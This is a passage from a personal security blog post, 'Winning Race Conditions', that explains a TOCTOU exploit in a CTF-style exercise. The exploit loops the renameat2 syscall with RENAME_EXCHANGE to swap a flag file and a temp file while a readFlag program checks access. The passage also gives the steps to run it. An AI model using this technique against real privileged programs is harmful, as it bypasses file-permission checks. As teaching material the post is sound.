</pre></table></code></div></div><p>Copy the C code and compile it normally with gcc, that being done, let’s understand the code :</p><p><strong>Line 1 to 7 are just imports</strong></p><p><strong>Line 11</strong> has infinite While loop as while(1) is always true</p><p><strong>Line 12 here has a super important</strong> “syscall()” will call the system call from C program, here it calls renameat2 system call.</p><p>We pass the two arguments as filenames we want to rapidly swap as argv[1] and argv[2]. Let’s understand other parameters:</p><ol><li><p><strong>AT_FDCWD</strong> :If pathname is relative and dirfd is the special value AT_FDCWD, then pathname is interpreted relative to the current working directory of the calling process.</p><li><p><strong>RENAME_EXCHANGE</strong> — does an atomic exchange. Atomic exchange? yeah that’s new to me too … here it is</p></ol><p><a href="http://www.embhack.com/atomic-operation-in-linux-kernel/">Atomic Operation in Linx Kernel - EmbHack</a></p><h3 id="how-to-use-the-exploit-"><span class="mr-2">HOW TO USE THE EXPLOIT ?</span><a href="#how-to-use-the-exploit-" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3><p>Now as we have the exploit and we know how it works, let’s use it.</p><p>just create a temp. file with anything in it</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="nb">echo</span> <span class="s2">"1"</span> <span class="o">&gt;</span>./temp
</pre></table></code></div></div><p>Now run the exploit program with the flag and temp file as its parameters</p><p><img data-src="https://miro.medium.com/max/1400/1*QUfK9dAuHDDBtg3RvYQitQ.png" alt="" data-proofer-ignore></p><p>this will not produce any output but let it run, it is swapping the two files rapidly.</p><p>Now OPEN NEW TERMINAL and run readFlag program with flag as parameter.</p><p><img data-src="https://miro.medium.com/max/1400/1*MbvBeaL5aKkPsBycGRjEQw.png" alt="Flag.png" data-proofer-ignore></p><p>AND THERE WE HAVE IT !! our F L A G…</p><h4 id="sign-off"><span class="mr-2">Sign-off</span><a href="#sign-off" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4><p>Phew! that was lots of information for one article, I understand … may be it’s not that simple as I intended to make it but believe me when i say this… I was just amazed and overwhelmed with the knowledge I gained on my way through it and wanted to share it asap.</p><p>Well I hope this was new to you too and you enjoyed it, if you have any suggestion or feedback, feel free to drop it in comments.</p><p>See ya all in next article, till then keep your bodies caffeinated enough!</p><blockquote><p>NOTE: here is an awesome video by LiveOverflow on the same topic and actually this is the one which inspired me to write about it. <a href="https://www.youtube.com/watch?v=5g137gsB9Wk&amp;feature=youtu.be">YOUTUBE LINK</a></p></blockquote></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/blog/categories/security/'>Security</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/blog/tags/race-condition/" class="post-tag no-text-decoration" >race condition</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/"> CC BY 4.0 </a> by the author.</div><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=Winning+Race+Conditions+-+Saket%27s+Blog&url=%2Fblog%2Fposts%2FWinning-Race-Conditions%2F" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank" rel="noopener" aria-label="Twitter"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=Winning+Race+Conditions+-+Saket%27s+Blog&u=%2Fblog%2Fposts%2FWinning-Race-Conditions%2F" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank" rel="noopener" aria-label="Facebook"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://t.me/share/url?url=%2Fblog%2Fposts%2FWinning-Race-Conditions%2F&text=Winning+Race+Conditions+-+Saket%27s+Blog" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank" rel="noopener" aria-label="Telegram"> <i class="fa-fw fab fa-telegram"></i> </a> <a href="https://www.linkedin.com/sharing/share-offsite/?url=%2Fblog%2Fposts%2FWinning-Race-Conditions%2F" data-toggle="tooltip" data-placement="top" title="Linkedin" target="_blank" rel="noopener" aria-label="Linkedin"> <i class="fa-fw fab fa-linkedin"></i> </a> <i id="copy-link" class="fa-fw fas fa-link small" data-toggle="tooltip" data-placement="top" title="Copy link" data-title-succeed="Link copied successfully!"> </i> </span></div></div></div></div></div><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted"><div class="access"><div id="access-tags"><div class="panel-heading">Trending Tags</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/blog/tags/ctf-writeup/">ctf writeup</a> <a class="post-tag" href="/blog/tags/android/">android</a> <a class="post-tag" href="/blog/tags/ctf/">ctf</a> <a class="post-tag" href="/blog/tags/encryption/">encryption</a> <a class="post-tag" href="/blog/tags/malware-analysis/">malware analysis</a> <a class="post-tag" href="/blog/tags/privacy/">privacy</a> <a class="post-tag" href="/blog/tags/reverse-engineering/">reverse engineering</a> <a class="post-tag" href="/blog/tags/assembly/">Assembly</a> <a class="post-tag" href="/blog/tags/brainfuck/">brainfuck</a> <a class="post-tag" href="/blog/tags/crunch/">crunch</a></div></div></div><script src="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.js"></script><div id="toc-wrapper" class="pl-0 pr-4 mb-5"><div class="panel-heading pl-3 pt-2 mb-2">Contents</div><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 pl-3 pr-3 pr-xl-4"><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/blog/posts/Secure-Work/"><div class="card-body"> <em class="small" data-ts="1605940932" data-df="ll" > Nov 21, 2020 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Secure your work like a Pro</h3><div class="text-muted small"><p> Utilizing PGP Keys to Encrypt Everything you have. If you have some super private or confidential data on your computer and don’t want anyone to have it, even if they have login access of your co...</p></div></div></a></div><div class="card"> <a href="/blog/posts/rsanotonlargefiles/"><div class="card-body"> <em class="small" data-ts="1608834600" data-df="ll" > Dec 25, 2020 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>RSA is NOT used to encrypt LARGE files?</h3><div class="text-muted small"><p> Practical Understanding of Public-Key based Encryption Strategies and their Efficiency. Why do PGP / GPG and other encryption tools have &quot;encrypt with RSA&quot; option? And, what’s even the use of th...</p></div></div></a></div><div class="card"> <a href="/blog/posts/Pipe-Brute-force-Attack-via-Password-Generator/"><div class="card-body"> <em class="small" data-ts="1564209732" data-df="ll" > Jul 27, 2019 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Brute-force Attack via Pass. Gen.</h3><div class="text-muted small"><p> (Efficient and resource saving trick that was there for decades) During password cracking you might decide to brute force a target hash,any service or online website, for that you may need/create ...</p></div></div></a></div></div></div><div class="post-navigation d-flex justify-content-between"> <a href="/blog/posts/CipherCombat2-Digest/" class="btn btn-outline-primary" prompt="Older"><p>Digest [CipherCombat2.0 CTF write-up]</p></a> <a href="/blog/posts/Recover-Deleted-Files-in-Linux/" class="btn btn-outline-primary" prompt="Newer"><p>Recover Files in Linux from Live Processes</p></a></div></div></div><footer class="row pl-3 pr-3"><div class="col-12 d-flex justify-content-between align-items-center text-muted pl-0 pr-0"><div class="footer-left"><p class="mb-0"><p xmlns:cc="http://creativecommons.org/ns#" xmlns:dct="http://purl.org/dc/terms/"><a property="dct:title" rel="cc:attributionURL" href="https://saket-upadhyay.github.io/blog">Saket's Blog</a> by <a rel="cc:attributionURL dct:creator" property="cc:attributionName" href="https://saket-upadhyay.github.io">Saket Upadhyay</a> is licensed under <a href="http://creativecommons.org/licenses/by-sa/4.0/?ref=chooser-v1" target="_blank" rel="license noopener noreferrer" style="display:inline-block;">CC BY-SA 4.0<img style="height:22px!important;margin-left:3px;vertical-align:text-bottom;" src="https://mirrors.creativecommons.org/presskit/icons/cc.svg?ref=chooser-v1"><img style="height:22px!important;margin-left:3px;vertical-align:text-bottom;" src="https://mirrors.creativecommons.org/presskit/icons/by.svg?ref=chooser-v1"><img style="height:22px!important;margin-left:3px;vertical-align:text-bottom;" src="https://mirrors.creativecommons.org/presskit/icons/sa.svg"></a></p></p></div><div class="footer-right"><p class="mb-0"> Powered by Jekyll.</p></div></div></footer></div><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-sm-11 post-content"><div id="search-hints"><div id="access-tags"><div class="panel-heading">Trending Tags</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/blog/tags/ctf-writeup/">ctf writeup</a> <a class="post-tag" href="/blog/tags/android/">android</a> <a class="post-tag" href="/blog/tags/ctf/">ctf</a> <a class="post-tag" href="/blog/tags/encryption/">encryption</a> <a class="post-tag" href="/blog/tags/malware-analysis/">malware analysis</a> <a class="post-tag" href="/blog/tags/privacy/">privacy</a> <a class="post-tag" href="/blog/tags/reverse-engineering/">reverse engineering</a> <a class="post-tag" href="/blog/tags/assembly/">Assembly</a> <a class="post-tag" href="/blog/tags/brainfuck/">brainfuck</a> <a class="post-tag" href="/blog/tags/crunch/">crunch</a></div></div></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a><div id="notification" class="toast" role="alert" aria-live="assertive" aria-atomic="true" data-animation="true" data-autohide="false"><div class="toast-header"> <button type="button" class="ml-2 ml-auto close" data-dismiss="toast" aria-label="Close"> <span aria-hidden="true">&times;</span> </button></div><div class="toast-body text-center pt-0"><p class="pl-2 pr-2 mb-3">A new version of content is available.</p><button type="button" class="btn btn-primary" aria-label="Update"> Update </button></div></div><script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/blog/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"> {categories} {tags}</div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No results found.</p>', templateMiddleware: function(prop, value, template) { if (prop === 'categories') { if (value === '') { return `${value}`; } else { return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`; } } if (prop === 'tags') { if (value === '') { return `${value}`; } else { return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`; } } } }); </script> <script src="https://cdn.jsdelivr.net/combine/npm/magnific-popup@1/dist/jquery.magnific-popup.min.js,npm/lozad/dist/lozad.min.js,npm/clipboard@2/dist/clipboard.min.js"></script> <script src="https://cdn.jsdelivr.net/combine/npm/dayjs@1/dayjs.min.js,npm/dayjs@1/locale/en.min.js,npm/dayjs@1/plugin/relativeTime.min.js,npm/dayjs@1/plugin/localizedFormat.min.js"></script> <script defer src="/blog/assets/js/dist/post.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.bundle.min.js"></script> <script defer src="/blog/app.js"></script>
